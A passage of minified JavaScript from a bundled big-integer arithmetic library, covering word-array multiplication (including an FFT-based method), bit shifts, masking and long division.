G=0,X=0;X<P.length;X++)G=(f=(0|v.words[X])-(0|P.words[X])+G)>>26,this.words[X]=67108863&f;for(;0!==G&&X<v.length;X++)G=(f=(0|v.words[X])+G)>>26,this.words[X]=67108863&f;if(0===G&&X<v.length&&v!==this)for(;X<v.length;X++)this.words[X]=v.words[X];return this.length=Math.max(this.length,X),v!==this&&(this.negative=1),this.strip()},I.prototype.sub=function(l){return this.clone().isub(l)};var D=function(l,f,A){var L,h,R,v=l.words,P=f.words,G=A.words,X=0,J=0|v[0],Z=8191&J,ue=J>>>13,Ie=0|v[1],Ae=8191&Ie,Ue=Ie>>>13,Xe=0|v[2],He=8191&Xe,Be=Xe>>>13,qe=0|v[3],De=8191&qe,Ve=qe>>>13,ze=0|v[4],me=8191&ze,Ke=ze>>>13,rt=0|v[5],Ge=8191&rt,Qe=rt>>>13,ht=0|v[6],mt=8191&ht,lt=ht>>>13,ft=0|v[7],xe=8191&ft,We=ft>>>13,Je=0|v[8],Oe=8191&Je,Te=Je>>>13,Le=0|v[9],$e=8191&Le,st=Le>>>13,xt=0|P[0],pt=8191&xt,vt=xt>>>13,Wi=0|P[1],Ft=8191&Wi,zt=Wi>>>13,pa=0|P[2],Jt=8191&pa,Gt=pa>>>13,Co=0|P[3],jt=8191&Co,qt=Co>>>13,Qn=0|P[4],Kt=8191&Qn,Zt=Qn>>>13,Bo=0|P[5],ti=8191&Bo,ii=Bo>>>13,pn=0|P[6],Pt=8191&pn,Xt=pn>>>13,Ho=0|P[7],Qt=8191&Ho,ei=Ho>>>13,$o=0|P[8],ai=8191&$o,$t=$o>>>13,zo=0|P[9],Ut=8191&zo,Yt=zo>>>13;A.negative=l.negative^f.negative,A.length=19;var ha=(X+(L=Math.imul(Z,pt))|0)+((8191&(h=(h=Math.imul(Z,vt))+Math.imul(ue,pt)|0))<<13)|0;X=((R=Math.imul(ue,vt))+(h>>>13)|0)+(ha>>>26)|0,ha&=67108863,L=Math.imul(Ae,pt),h=(h=Math.imul(Ae,vt))+Math.imul(Ue,pt)|0,R=Math.imul(Ue,vt);var Ha=(X+(L=L+Math.imul(Z,Ft)|0)|0)+((8191&(h=(h=h+Math.imul(Z,zt)|0)+Math.imul(ue,Ft)|0))<<13)|0;X=((R=R+Math.imul(ue,zt)|0)+(h>>>13)|0)+(Ha>>>26)|0,Ha&=67108863,L=Math.imul(He,pt),h=(h=Math.imul(He,vt))+Math.imul(Be,pt)|0,R=Math.imul(Be,vt),L=L+Math.imul(Ae,Ft)|0,h=(h=h+Math.imul(Ae,zt)|0)+Math.imul(Ue,Ft)|0,R=R+Math.imul(Ue,zt)|0;var Va=(X+(L=L+Math.imul(Z,Jt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Gt)|0)+Math.imul(ue,Jt)|0))<<13)|0;X=((R=R+Math.imul(ue,Gt)|0)+(h>>>13)|0)+(Va>>>26)|0,Va&=67108863,L=Math.imul(De,pt),h=(h=Math.imul(De,vt))+Math.imul(Ve,pt)|0,R=Math.imul(Ve,vt),L=L+Math.imul(He,Ft)|0,h=(h=h+Math.imul(He,zt)|0)+Math.imul(Be,Ft)|0,R=R+Math.imul(Be,zt)|0,L=L+Math.imul(Ae,Jt)|0,h=(h=h+Math.imul(Ae,Gt)|0)+Math.imul(Ue,Jt)|0,R=R+Math.imul(Ue,Gt)|0;var co=(X+(L=L+Math.imul(Z,jt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,qt)|0)+Math.imul(ue,jt)|0))<<13)|0;X=((R=R+Math.imul(ue,qt)|0)+(h>>>13)|0)+(co>>>26)|0,co&=67108863,L=Math.imul(me,pt),h=(h=Math.imul(me,vt))+Math.imul(Ke,pt)|0,R=Math.imul(Ke,vt),L=L+Math.imul(De,Ft)|0,h=(h=h+Math.imul(De,zt)|0)+Math.imul(Ve,Ft)|0,R=R+Math.imul(Ve,zt)|0,L=L+Math.imul(He,Jt)|0,h=(h=h+Math.imul(He,Gt)|0)+Math.imul(Be,Jt)|0,R=R+Math.imul(Be,Gt)|0,L=L+Math.imul(Ae,jt)|0,h=(h=h+Math.imul(Ae,qt)|0)+Math.imul(Ue,jt)|0,R=R+Math.imul(Ue,qt)|0;var io=(X+(L=L+Math.imul(Z,Kt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Zt)|0)+Math.imul(ue,Kt)|0))<<13)|0;X=((R=R+Math.imul(ue,Zt)|0)+(h>>>13)|0)+(io>>>26)|0,io&=67108863,L=Math.imul(Ge,pt),h=(h=Math.imul(Ge,vt))+Math.imul(Qe,pt)|0,R=Math.imul(Qe,vt),L=L+Math.imul(me,Ft)|0,h=(h=h+Math.imul(me,zt)|0)+Math.imul(Ke,Ft)|0,R=R+Math.imul(Ke,zt)|0,L=L+Math.imul(De,Jt)|0,h=(h=h+Math.imul(De,Gt)|0)+Math.imul(Ve,Jt)|0,R=R+Math.imul(Ve,Gt)|0,L=L+Math.imul(He,jt)|0,h=(h=h+Math.imul(He,qt)|0)+Math.imul(Be,jt)|0,R=R+Math.imul(Be,qt)|0,L=L+Math.imul(Ae,Kt)|0,h=(h=h+Math.imul(Ae,Zt)|0)+Math.imul(Ue,Kt)|0,R=R+Math.imul(Ue,Zt)|0;var yo=(X+(L=L+Math.imul(Z,ti)|0)|0)+((8191&(h=(h=h+Math.imul(Z,ii)|0)+Math.imul(ue,ti)|0))<<13)|0;X=((R=R+Math.imul(ue,ii)|0)+(h>>>13)|0)+(yo>>>26)|0,yo&=67108863,L=Math.imul(mt,pt),h=(h=Math.imul(mt,vt))+Math.imul(lt,pt)|0,R=Math.imul(lt,vt),L=L+Math.imul(Ge,Ft)|0,h=(h=h+Math.imul(Ge,zt)|0)+Math.imul(Qe,Ft)|0,R=R+Math.imul(Qe,zt)|0,L=L+Math.imul(me,Jt)|0,h=(h=h+Math.imul(me,Gt)|0)+Math.imul(Ke,Jt)|0,R=R+Math.imul(Ke,Gt)|0,L=L+Math.imul(De,jt)|0,h=(h=h+Math.imul(De,qt)|0)+Math.imul(Ve,jt)|0,R=R+Math.imul(Ve,qt)|0,L=L+Math.imul(He,Kt)|0,h=(h=h+Math.imul(He,Zt)|0)+Math.imul(Be,Kt)|0,R=R+Math.imul(Be,Zt)|0,L=L+Math.imul(Ae,ti)|0,h=(h=h+Math.imul(Ae,ii)|0)+Math.imul(Ue,ti)|0,R=R+Math.imul(Ue,ii)|0;var Vn=(X+(L=L+Math.imul(Z,Pt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Xt)|0)+Math.imul(ue,Pt)|0))<<13)|0;X=((R=R+Math.imul(ue,Xt)|0)+(h>>>13)|0)+(Vn>>>26)|0,Vn&=67108863,L=Math.imul(xe,pt),h=(h=Math.imul(xe,vt))+Math.imul(We,pt)|0,R=Math.imul(We,vt),L=L+Math.imul(mt,Ft)|0,h=(h=h+Math.imul(mt,zt)|0)+Math.imul(lt,Ft)|0,R=R+Math.imul(lt,zt)|0,L=L+Math.imul(Ge,Jt)|0,h=(h=h+Math.imul(Ge,Gt)|0)+Math.imul(Qe,Jt)|0,R=R+Math.imul(Qe,Gt)|0,L=L+Math.imul(me,jt)|0,h=(h=h+Math.imul(me,qt)|0)+Math.imul(Ke,jt)|0,R=R+Math.imul(Ke,qt)|0,L=L+Math.imul(De,Kt)|0,h=(h=h+Math.imul(De,Zt)|0)+Math.imul(Ve,Kt)|0,R=R+Math.imul(Ve,Zt)|0,L=L+Math.imul(He,ti)|0,h=(h=h+Math.imul(He,ii)|0)+Math.imul(Be,ti)|0,R=R+Math.imul(Be,ii)|0,L=L+Math.imul(Ae,Pt)|0,h=(h=h+Math.imul(Ae,Xt)|0)+Math.imul(Ue,Pt)|0,R=R+Math.imul(Ue,Xt)|0;var Eo=(X+(L=L+Math.imul(Z,Qt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,ei)|0)+Math.imul(ue,Qt)|0))<<13)|0;X=((R=R+Math.imul(ue,ei)|0)+(h>>>13)|0)+(Eo>>>26)|0,Eo&=67108863,L=Math.imul(Oe,pt),h=(h=Math.imul(Oe,vt))+Math.imul(Te,pt)|0,R=Math.imul(Te,vt),L=L+Math.imul(xe,Ft)|0,h=(h=h+Math.imul(xe,zt)|0)+Math.imul(We,Ft)|0,R=R+Math.imul(We,zt)|0,L=L+Math.imul(mt,Jt)|0,h=(h=h+Math.imul(mt,Gt)|0)+Math.imul(lt,Jt)|0,R=R+Math.imul(lt,Gt)|0,L=L+Math.imul(Ge,jt)|0,h=(h=h+Math.imul(Ge,qt)|0)+Math.imul(Qe,jt)|0,R=R+Math.imul(Qe,qt)|0,L=L+Math.imul(me,Kt)|0,h=(h=h+Math.imul(me,Zt)|0)+Math.imul(Ke,Kt)|0,R=R+Math.imul(Ke,Zt)|0,L=L+Math.imul(De,ti)|0,h=(h=h+Math.imul(De,ii)|0)+Math.imul(Ve,ti)|0,R=R+Math.imul(Ve,ii)|0,L=L+Math.imul(He,Pt)|0,h=(h=h+Math.imul(He,Xt)|0)+Math.imul(Be,Pt)|0,R=R+Math.imul(Be,Xt)|0,L=L+Math.imul(Ae,Qt)|0,h=(h=h+Math.imul(Ae,ei)|0)+Math.imul(Ue,Qt)|0,R=R+Math.imul(Ue,ei)|0;var Pn=(X+(L=L+Math.imul(Z,ai)|0)|0)+((8191&(h=(h=h+Math.imul(Z,$t)|0)+Math.imul(ue,ai)|0))<<13)|0;X=((R=R+Math.imul(ue,$t)|0)+(h>>>13)|0)+(Pn>>>26)|0,Pn&=67108863,L=Math.imul($e,pt),h=(h=Math.imul($e,vt))+Math.imul(st,pt)|0,R=Math.imul(st,vt),L=L+Math.imul(Oe,Ft)|0,h=(h=h+Math.imul(Oe,zt)|0)+Math.imul(Te,Ft)|0,R=R+Math.imul(Te,zt)|0,L=L+Math.imul(xe,Jt)|0,h=(h=h+Math.imul(xe,Gt)|0)+Math.imul(We,Jt)|0,R=R+Math.imul(We,Gt)|0,L=L+Math.imul(mt,jt)|0,h=(h=h+Math.imul(mt,qt)|0)+Math.imul(lt,jt)|0,R=R+Math.imul(lt,qt)|0,L=L+Math.imul(Ge,Kt)|0,h=(h=h+Math.imul(Ge,Zt)|0)+Math.imul(Qe,Kt)|0,R=R+Math.imul(Qe,Zt)|0,L=L+Math.imul(me,ti)|0,h=(h=h+Math.imul(me,ii)|0)+Math.imul(Ke,ti)|0,R=R+Math.imul(Ke,ii)|0,L=L+Math.imul(De,Pt)|0,h=(h=h+Math.imul(De,Xt)|0)+Math.imul(Ve,Pt)|0,R=R+Math.imul(Ve,Xt)|0,L=L+Math.imul(He,Qt)|0,h=(h=h+Math.imul(He,ei)|0)+Math.imul(Be,Qt)|0,R=R+Math.imul(Be,ei)|0,L=L+Math.imul(Ae,ai)|0,h=(h=h+Math.imul(Ae,$t)|0)+Math.imul(Ue,ai)|0,R=R+Math.imul(Ue,$t)|0;var lo=(X+(L=L+Math.imul(Z,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Yt)|0)+Math.imul(ue,Ut)|0))<<13)|0;X=((R=R+Math.imul(ue,Yt)|0)+(h>>>13)|0)+(lo>>>26)|0,lo&=67108863,L=Math.imul($e,Ft),h=(h=Math.imul($e,zt))+Math.imul(st,Ft)|0,R=Math.imul(st,zt),L=L+Math.imul(Oe,Jt)|0,h=(h=h+Math.imul(Oe,Gt)|0)+Math.imul(Te,Jt)|0,R=R+Math.imul(Te,Gt)|0,L=L+Math.imul(xe,jt)|0,h=(h=h+Math.imul(xe,qt)|0)+Math.imul(We,jt)|0,R=R+Math.imul(We,qt)|0,L=L+Math.imul(mt,Kt)|0,h=(h=h+Math.imul(mt,Zt)|0)+Math.imul(lt,Kt)|0,R=R+Math.imul(lt,Zt)|0,L=L+Math.imul(Ge,ti)|0,h=(h=h+Math.imul(Ge,ii)|0)+Math.imul(Qe,ti)|0,R=R+Math.imul(Qe,ii)|0,L=L+Math.imul(me,Pt)|0,h=(h=h+Math.imul(me,Xt)|0)+Math.imul(Ke,Pt)|0,R=R+Math.imul(Ke,Xt)|0,L=L+Math.imul(De,Qt)|0,h=(h=h+Math.imul(De,ei)|0)+Math.imul(Ve,Qt)|0,R=R+Math.imul(Ve,ei)|0,L=L+Math.imul(He,ai)|0,h=(h=h+Math.imul(He,$t)|0)+Math.imul(Be,ai)|0,R=R+Math.imul(Be,$t)|0;var ao=(X+(L=L+Math.imul(Ae,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Ae,Yt)|0)+Math.imul(Ue,Ut)|0))<<13)|0;X=((R=R+Math.imul(Ue,Yt)|0)+(h>>>13)|0)+(ao>>>26)|0,ao&=67108863,L=Math.imul($e,Jt),h=(h=Math.imul($e,Gt))+Math.imul(st,Jt)|0,R=Math.imul(st,Gt),L=L+Math.imul(Oe,jt)|0,h=(h=h+Math.imul(Oe,qt)|0)+Math.imul(Te,jt)|0,R=R+Math.imul(Te,qt)|0,L=L+Math.imul(xe,Kt)|0,h=(h=h+Math.imul(xe,Zt)|0)+Math.imul(We,Kt)|0,R=R+Math.imul(We,Zt)|0,L=L+Math.imul(mt,ti)|0,h=(h=h+Math.imul(mt,ii)|0)+Math.imul(lt,ti)|0,R=R+Math.imul(lt,ii)|0,L=L+Math.imul(Ge,Pt)|0,h=(h=h+Math.imul(Ge,Xt)|0)+Math.imul(Qe,Pt)|0,R=R+Math.imul(Qe,Xt)|0,L=L+Math.imul(me,Qt)|0,h=(h=h+Math.imul(me,ei)|0)+Math.imul(Ke,Qt)|0,R=R+Math.imul(Ke,ei)|0,L=L+Math.imul(De,ai)|0,h=(h=h+Math.imul(De,$t)|0)+Math.imul(Ve,ai)|0,R=R+Math.imul(Ve,$t)|0;var bo=(X+(L=L+Math.imul(He,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(He,Yt)|0)+Math.imul(Be,Ut)|0))<<13)|0;X=((R=R+Math.imul(Be,Yt)|0)+(h>>>13)|0)+(bo>>>26)|0,bo&=67108863,L=Math.imul($e,jt),h=(h=Math.imul($e,qt))+Math.imul(st,jt)|0,R=Math.imul(st,qt),L=L+Math.imul(Oe,Kt)|0,h=(h=h+Math.imul(Oe,Zt)|0)+Math.imul(Te,Kt)|0,R=R+Math.imul(Te,Zt)|0,L=L+Math.imul(xe,ti)|0,h=(h=h+Math.imul(xe,ii)|0)+Math.imul(We,ti)|0,R=R+Math.imul(We,ii)|0,L=L+Math.imul(mt,Pt)|0,h=(h=h+Math.imul(mt,Xt)|0)+Math.imul(lt,Pt)|0,R=R+Math.imul(lt,Xt)|0,L=L+Math.imul(Ge,Qt)|0,h=(h=h+Math.imul(Ge,ei)|0)+Math.imul(Qe,Qt)|0,R=R+Math.imul(Qe,ei)|0,L=L+Math.imul(me,ai)|0,h=(h=h+Math.imul(me,$t)|0)+Math.imul(Ke,ai)|0,R=R+Math.imul(Ke,$t)|0;var $n=(X+(L=L+Math.imul(De,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(De,Yt)|0)+Math.imul(Ve,Ut)|0))<<13)|0;X=((R=R+Math.imul(Ve,Yt)|0)+(h>>>13)|0)+($n>>>26)|0,$n&=67108863,L=Math.imul($e,Kt),h=(h=Math.imul($e,Zt))+Math.imul(st,Kt)|0,R=Math.imul(st,Zt),L=L+Math.imul(Oe,ti)|0,h=(h=h+Math.imul(Oe,ii)|0)+Math.imul(Te,ti)|0,R=R+Math.imul(Te,ii)|0,L=L+Math.imul(xe,Pt)|0,h=(h=h+Math.imul(xe,Xt)|0)+Math.imul(We,Pt)|0,R=R+Math.imul(We,Xt)|0,L=L+Math.imul(mt,Qt)|0,h=(h=h+Math.imul(mt,ei)|0)+Math.imul(lt,Qt)|0,R=R+Math.imul(lt,ei)|0,L=L+Math.imul(Ge,ai)|0,h=(h=h+Math.imul(Ge,$t)|0)+Math.imul(Qe,ai)|0,R=R+Math.imul(Qe,$t)|0;var Do=(X+(L=L+Math.imul(me,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(me,Yt)|0)+Math.imul(Ke,Ut)|0))<<13)|0;X=((R=R+Math.imul(Ke,Yt)|0)+(h>>>13)|0)+(Do>>>26)|0,Do&=67108863,L=Math.imul($e,ti),h=(h=Math.imul($e,ii))+Math.imul(st,ti)|0,R=Math.imul(st,ii),L=L+Math.imul(Oe,Pt)|0,h=(h=h+Math.imul(Oe,Xt)|0)+Math.imul(Te,Pt)|0,R=R+Math.imul(Te,Xt)|0,L=L+Math.imul(xe,Qt)|0,h=(h=h+Math.imul(xe,ei)|0)+Math.imul(We,Qt)|0,R=R+Math.imul(We,ei)|0,L=L+Math.imul(mt,ai)|0,h=(h=h+Math.imul(mt,$t)|0)+Math.imul(lt,ai)|0,R=R+Math.imul(lt,$t)|0;var Mo=(X+(L=L+Math.imul(Ge,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Ge,Yt)|0)+Math.imul(Qe,Ut)|0))<<13)|0;X=((R=R+Math.imul(Qe,Yt)|0)+(h>>>13)|0)+(Mo>>>26)|0,Mo&=67108863,L=Math.imul($e,Pt),h=(h=Math.imul($e,Xt))+Math.imul(st,Pt)|0,R=Math.imul(st,Xt),L=L+Math.imul(Oe,Qt)|0,h=(h=h+Math.imul(Oe,ei)|0)+Math.imul(Te,Qt)|0,R=R+Math.imul(Te,ei)|0,L=L+Math.imul(xe,ai)|0,h=(h=h+Math.imul(xe,$t)|0)+Math.imul(We,ai)|0,R=R+Math.imul(We,$t)|0;var no=(X+(L=L+Math.imul(mt,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(mt,Yt)|0)+Math.imul(lt,Ut)|0))<<13)|0;X=((R=R+Math.imul(lt,Yt)|0)+(h>>>13)|0)+(no>>>26)|0,no&=67108863,L=Math.imul($e,Qt),h=(h=Math.imul($e,ei))+Math.imul(st,Qt)|0,R=Math.imul(st,ei),L=L+Math.imul(Oe,ai)|0,h=(h=h+Math.imul(Oe,$t)|0)+Math.imul(Te,ai)|0,R=R+Math.imul(Te,$t)|0;var Kn=(X+(L=L+Math.imul(xe,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(xe,Yt)|0)+Math.imul(We,Ut)|0))<<13)|0;X=((R=R+Math.imul(We,Yt)|0)+(h>>>13)|0)+(Kn>>>26)|0,Kn&=67108863,L=Math.imul($e,ai),h=(h=Math.imul($e,$t))+Math.imul(st,ai)|0,R=Math.imul(st,$t);var Sa=(X+(L=L+Math.imul(Oe,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Oe,Yt)|0)+Math.imul(Te,Ut)|0))<<13)|0;X=((R=R+Math.imul(Te,Yt)|0)+(h>>>13)|0)+(Sa>>>26)|0,Sa&=67108863;var ra=(X+(L=Math.imul($e,Ut))|0)+((8191&(h=(h=Math.imul($e,Yt))+Math.imul(st,Ut)|0))<<13)|0;return X=((R=Math.imul(st,Yt))+(h>>>13)|0)+(ra>>>26)|0,ra&=67108863,G[0]=ha,G[1]=Ha,G[2]=Va,G[3]=co,G[4]=io,G[5]=yo,G[6]=Vn,G[7]=Eo,G[8]=Pn,G[9]=lo,G[10]=ao,G[11]=bo,G[12]=$n,G[13]=Do,G[14]=Mo,G[15]=no,G[16]=Kn,G[17]=Sa,G[18]=ra,0!==X&&(G[19]=X,A.length++),A};function x(z,l,f){return(new S).mulp(z,l,f)}function S(z,l){this.x=z,this.y=l}Math.imul||(D=p),I.prototype.mulTo=function(l,f){var A,v=this.length+l.length;return A=10===this.length&&10===l.length?D(this,l,f):v<63?p(this,l,f):v<1024?function w(z,l,f){f.negative=l.negative^z.negative,f.length=z.length+l.length;for(var A=0,v=0,P=0;P<f.length-1;P++){var G=v;v=0;for(var X=67108863&A,L=Math.min(P,l.length-1),h=Math.max(0,P-z.length+1);h<=L;h++){var ue=(0|z.words[P-h])*(0|l.words[h]),Ie=67108863&ue;X=67108863&(Ie=Ie+X|0),v+=(G=(G=G+(ue/67108864|0)|0)+(Ie>>>26)|0)>>>26,G&=67108863}f.words[P]=X,A=G,G=v}return 0!==A?f.words[P]=A:f.length--,f.strip()}(this,l,f):x(this,l,f),A},S.prototype.makeRBT=function(l){for(var f=new Array(l),A=I.prototype._countBits(l)-1,v=0;v<l;v++)f[v]=this.revBin(v,A,l);return f},S.prototype.revBin=function(l,f,A){if(0===l||l===A-1)return l;for(var v=0,P=0;P<f;P++)v|=(1&l)<<f-P-1,l>>=1;return v},S.prototype.permute=function(l,f,A,v,P,G){for(var X=0;X<G;X++)v[X]=f[l[X]],P[X]=A[l[X]]},S.prototype.transform=function(l,f,A,v,P,G){this.permute(G,l,f,A,v,P);for(var X=1;X<P;X<<=1)for(var L=X<<1,h=Math.cos(2*Math.PI/L),R=Math.sin(2*Math.PI/L),J=0;J<P;J+=L)for(var Z=h,ue=R,Ie=0;Ie<X;Ie++){var Ae=A[J+Ie],Ue=v[J+Ie],Xe=A[J+Ie+X],He=v[J+Ie+X],Be=Z*Xe-ue*He;He=Z*He+ue*Xe,A[J+Ie]=Ae+(Xe=Be),v[J+Ie]=Ue+He,A[J+Ie+X]=Ae-Xe,v[J+Ie+X]=Ue-He,Ie!==L&&(Be=h*Z-R*ue,ue=h*ue+R*Z,Z=Be)}},S.prototype.guessLen13b=function(l,f){var A=1|Math.max(f,l),v=1&A,P=0;for(A=A/2|0;A;A>>>=1)P++;return 1<<P+1+v},S.prototype.conjugate=function(l,f,A){if(!(A<=1))for(var v=0;v<A/2;v++){var P=l[v];l[v]=l[A-v-1],l[A-v-1]=P,P=f[v],f[v]=-f[A-v-1],f[A-v-1]=-P}},S.prototype.normalize13b=function(l,f){for(var A=0,v=0;v<f/2;v++){var P=8192*Math.round(l[2*v+1]/f)+Math.round(l[2*v]/f)+A;l[v]=67108863&P,A=P<67108864?0:P/67108864|0}return l},S.prototype.convert13b=function(l,f,A,v){for(var P=0,G=0;G<f;G++)A[2*G]=8191&(P+=0|l[G]),A[2*G+1]=8191&(P>>>=13),P>>>=13;for(G=2*f;G<v;++G)A[G]=0;$(0===P),$(0==(-8192&P))},S.prototype.stub=function(l){for(var f=new Array(l),A=0;A<l;A++)f[A]=0;return f},S.prototype.mulp=function(l,f,A){var v=2*this.guessLen13b(l.length,f.length),P=this.makeRBT(v),G=this.stub(v),X=new Array(v),L=new Array(v),h=new Array(v),R=new Array(v),J=new Array(v),Z=new Array(v),ue=A.words;ue.length=v,this.convert13b(l.words,l.length,X,v),this.convert13b(f.words,f.length,R,v),this.transform(X,G,L,h,v,P),this.transform(R,G,J,Z,v,P);for(var Ie=0;Ie<v;Ie++){var Ae=L[Ie]*J[Ie]-h[Ie]*Z[Ie];h[Ie]=L[Ie]*Z[Ie]+h[Ie]*J[Ie],L[Ie]=Ae}return this.conjugate(L,h,v),this.transform(L,h,ue,G,v,P),this.conjugate(ue,G,v),this.normalize13b(ue,v),A.negative=l.negative^f.negative,A.length=l.length+f.length,A.strip()},I.prototype.mul=function(l){var f=new I(null);return f.words=new Array(this.length+l.length),this.mulTo(l,f)},I.prototype.mulf=function(l){var f=new I(null);return f.words=new Array(this.length+l.length),x(this,l,f)},I.prototype.imul=function(l){return this.clone().mulTo(l,this)},I.prototype.imuln=function(l){$("number"==typeof l),$(l<67108864);for(var f=0,A=0;A<this.length;A++){var v=(0|this.words[A])*l,P=(67108863&v)+(67108863&f);f>>=26,f+=v/67108864|0,f+=P>>>26,this.words[A]=67108863&P}return 0!==f&&(this.words[A]=f,this.length++),this},I.prototype.muln=function(l){return this.clone().imuln(l)},I.prototype.sqr=function(){return this.mul(this)},I.prototype.isqr=function(){return this.imul(this.clone())},I.prototype.pow=function(l){var f=function M(z){for(var l=new Array(z.bitLength()),f=0;f<l.length;f++){var v=f%26;l[f]=(z.words[f/26|0]&1<<v)>>>v}return l}(l);if(0===f.length)return new I(1);for(var A=this,v=0;v<f.length&&0===f[v];v++,A=A.sqr());if(++v<f.length)for(var P=A.sqr();v<f.length;v++,P=P.sqr())0!==f[v]&&(A=A.mul(P));return A},I.prototype.iushln=function(l){$("number"==typeof l&&l>=0);var P,f=l%26,A=(l-f)/26,v=67108863>>>26-f<<26-f;if(0!==f){var G=0;for(P=0;P<this.length;P++){var X=this.words[P]&v;this.words[P]=(0|this.words[P])-X<<f|G,G=X>>>26-f}G&&(this.words[P]=G,this.length++)}if(0!==A){for(P=this.length-1;P>=0;P--)this.words[P+A]=this.words[P];for(P=0;P<A;P++)this.words[P]=0;this.length+=A}return this.strip()},I.prototype.ishln=function(l){return $(0===this.negative),this.iushln(l)},I.prototype.iushrn=function(l,f,A){var v;$("number"==typeof l&&l>=0),v=f?(f-f%26)/26:0;var P=l%26,G=Math.min((l-P)/26,this.length),X=67108863^67108863>>>P<<P,L=A;if(v-=G,v=Math.max(0,v),L){for(var h=0;h<G;h++)L.words[h]=this.words[h];L.length=G}if(0!==G)if(this.length>G)for(this.length-=G,h=0;h<this.length;h++)this.words[h]=this.words[h+G];else this.words[0]=0,this.length=1;var R=0;for(h=this.length-1;h>=0&&(0!==R||h>=v);h--){var J=0|this.words[h];this.words[h]=R<<26-P|J>>>P,R=J&X}return L&&0!==R&&(L.words[L.length++]=R),0===this.length&&(this.words[0]=0,this.length=1),this.strip()},I.prototype.ishrn=function(l,f,A){return $(0===this.negative),this.iushrn(l,f,A)},I.prototype.shln=function(l){return this.clone().ishln(l)},I.prototype.ushln=function(l){return this.clone().iushln(l)},I.prototype.shrn=function(l){return this.clone().ishrn(l)},I.prototype.ushrn=function(l){return this.clone().iushrn(l)},I.prototype.testn=function(l){$("number"==typeof l&&l>=0);var f=l%26,A=(l-f)/26;return!(this.length<=A||!(this.words[A]&1<<f))},I.prototype.imaskn=function(l){$("number"==typeof l&&l>=0);var f=l%26,A=(l-f)/26;return $(0===this.negative,"imaskn works only with positive numbers"),this.length<=A?this:(0!==f&&A++,this.length=Math.min(A,this.length),0!==f&&(this.words[this.length-1]&=67108863^67108863>>>f<<f),this.strip())},I.prototype.maskn=function(l){return this.clone().imaskn(l)},I.prototype.iaddn=function(l){return $("number"==typeof l),$(l<67108864),l<0?this.isubn(-l):0!==this.negative?1===this.length&&(0|this.words[0])<l?(this.words[0]=l-(0|this.words[0]),this.negative=0,this):(this.negative=0,this.isubn(l),this.negative=1,this):this._iaddn(l)},I.prototype._iaddn=function(l){this.words[0]+=l;for(var f=0;f<this.length&&this.words[f]>=67108864;f++)this.words[f]-=67108864,f===this.length-1?this.words[f+1]=1:this.words[f+1]++;return this.length=Math.max(this.length,f+1),this},I.prototype.isubn=function(l){if($("number"==typeof l),$(l<67108864),l<0)return this.iaddn(-l);if(0!==this.negative)return this.negative=0,this.iaddn(l),this.negative=1,this;if(this.words[0]-=l,1===this.length&&this.words[0]<0)this.words[0]=-this.words[0],this.negative=1;else for(var f=0;f<this.length&&this.words[f]<0;f++)this.words[f]+=67108864,this.words[f+1]-=1;return this.strip()},I.prototype.addn=function(l){return this.clone().iaddn(l)},I.prototype.subn=function(l){return this.clone().isubn(l)},I.prototype.iabs=function(){return this.negative=0,this},I.prototype.abs=function(){return this.clone().iabs()},I.prototype._ishlnsubmul=function(l,f,A){var P;this._expand(l.length+A);var G,X=0;for(P=0;P<l.length;P++){G=(0|this.words[P+A])+X;var L=(0|l.words[P])*f;X=((G-=67108863&L)>>26)-(L/67108864|0),this.words[P+A]=67108863&G}for(;P<this.length-A;P++)X=(G=(0|this.words[P+A])+X)>>26,this.words[P+A]=67108863&G;if(0===X)return this.strip();for($(-1===X),X=0,P=0;P<this.length;P++)X=(G=-(0|this.words[P])+X)>>26,this.words[P]=67108863&G;return this.negative=1,this.strip()},I.prototype._wordDiv=function(l,f){var A,v=this.clone(),P=l,G=0|P.words[P.length-1];0!=(A=26-this._countBits(G))&&(P=P.ushln(A),v.iushln(A),G=0|P.words[P.length-1]);var h,L=v.length-P.length;if("mod"!==f){(h=new I(null)).length=L+1,h.words=new Array(h.length);for(var R=0;R<h.length;R++)h.words[R]=0}var J=v.clone()._ishlnsubmul(P,1,L);0===J.negative&&(v=J,h&&(h.words[L]=1));for(var Z=L-1;Z>=0;Z--){var ue=67108864*(0|v.words[P.length+Z])+(0|v.words[P.length+Z-1]);for(ue=Math.min(ue/G|0,67108863),v._ishlnsubmul(P,ue,Z);0!==v.negative;)ue--,v.negative=0,v._ishlnsubmul(P,1,Z),v.isZero()||(v.negative^=1);h&&(h.words[Z]=ue)}return h&&h.strip(),v.strip(),"div"!==f&&0!==A&&v.iushrn(A),{div:h||null,mod:v}},I.prototype.divmod=function(l,f,A){return $(!l.isZero()),this.isZero()?{div:new I(0),mod:new I(0)}:0!==this.negative&&0===l.negative?(G=this.neg().divmod(l,f),"mod"!==f&&(v=G.div.neg()),"div"!==f&&(P=G.mod.neg(),A&&0!==P.negative&&P.iadd(l)),{div:v,mod:P}):0===this.negative&&0!==l.negative?(G=this.divmod(l.neg(),f),"mod"!==f&&(v=G.div.neg()),{div:v,mod:G.mod}):0!=(this.negative&l.negative)?(G=this.neg().divmod(l.neg(),f),"div"!==f&&(P=G.mod.neg(),A&&0!==P.negative&&P.isub(l)),{div:G.div,mod:P}):l.length>this.length||this.cmp(l)<0?{div:new I(0),mod:this}:1===l.length?"div"===f?{div:this.divn(l.words[0]),mod:null}:"mod"===f?{div:null,mod:new I(this.modn(l.words[0]))}:{div:this.divn(l.words[0]),mod:new I(this.modn(l.words[0]))}:this._wordDiv(l,f);var v,P,G},I.prototype.div=function(l){return this.divmod(l,"div",!1).div},I.prototype.mod=function(l){return this.divmod(l,"mod",!1).mod},I.prototype.umod=function(l){return this.divmod(l,"mod",!0).mod},I.prototype.divRound=function(l){var f=this.divmod(l);if(f.mod.isZero())return f.div;var A=0!==f.div.negative?f.mod.isub(l):f.mod,v=l.ushrn(1),P=l.andln(1),G=A.cmp(v);return 